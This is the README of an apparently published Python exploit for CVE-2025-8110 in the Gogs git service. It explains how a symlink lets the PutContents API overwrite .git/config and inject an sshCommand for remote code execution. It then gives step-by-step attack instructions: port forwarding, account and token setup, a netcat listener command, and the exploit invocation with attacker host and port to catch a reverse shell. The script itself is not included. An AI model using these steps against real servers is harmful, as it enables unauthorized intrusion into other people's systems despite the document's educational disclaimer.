## https://sploitus.com/exploit?id=CF9783E2-A42B-522B-AE99-DB74B8CBE93B
# Gogs CVE-2025-8110 RCE Exploit
An automated Python exploit for **CVE-2025-8110** in Gogs. This vulnerability allows for Remote Code Execution (RCE) by abusing the `PutContents` API, which fails to validate if a file path is a symlink. By overwriting the internal `.git/config` file via a symlink, we can inject a malicious `sshCommand` to trigger a reverse shell.
## ๐ ๏ธ Prerequisites
Ensure you have Python 3 and the necessary dependencies installed:
```bash
pip install requests rich beautifulsoup4
```
You must also have **git** installed and reachable in your `$PATH` for the repository cloning and committing phase.
## โ๏ธ Setup & Configuration
### 1. Accessing the Gogs WebUI
Gogs may be bound to `127.0.0.1:3001`. Use port forwarding to access the WebUI locally:
```bash
ssh -L 3001:127.0.0.1:3001 user@target-ip
```
### 2. Account Creation
Once forwarded, navigate to `http://localhost:3001`:
* Create a new account.
* Note down your **Username** and **Password** for the script.
### 3. Generating the API Token
The script uses the Gogs API to deliver the payload:
1. Log in to the WebUI.
2. Navigate to **Settings** -> **Applications**.
3. Under **Manage Personal Access Tokens**, generate a new token.
4. Copy the token immediately.
---
## ๐ Execution
### 1. Start a Netcat Listener
Start your listener before running the script, as the shell triggers as soon as the API update is processed.
```bash
nc -lvnp 5555
```
### 2. Run the Exploit
Pass your credentials and the token as arguments:
```bash
python3 exploit.py -u http://localhost:3001 -un -pw -t -lh -lp 5555
```
### Arguments
| Flag | Description |
| :--- | :--- |
| `-u` | The base URL of the Gogs instance (e.g., `http://localhost:3001`). |
| `-un` | The username of the account you created. |
| `-pw` | The password of the account you created. |
| `-t` | The API token generated in Settings. |
| `-lh` | Your listener's IP address (LHOST). |
| `-lp` | Your listener's port (LPORT). |
> **Note:** If the script hangs or returns a `Read timed out` after "Overwriting .git/config", check your listener. This usually indicates the reverse shell has connected successfully and is holding the connection.
---
**Author:** [TYehan](https://github.com/TYehan)
**Disclaimer:** This tool is for educational purposes and authorized security auditing only. Use responsibly.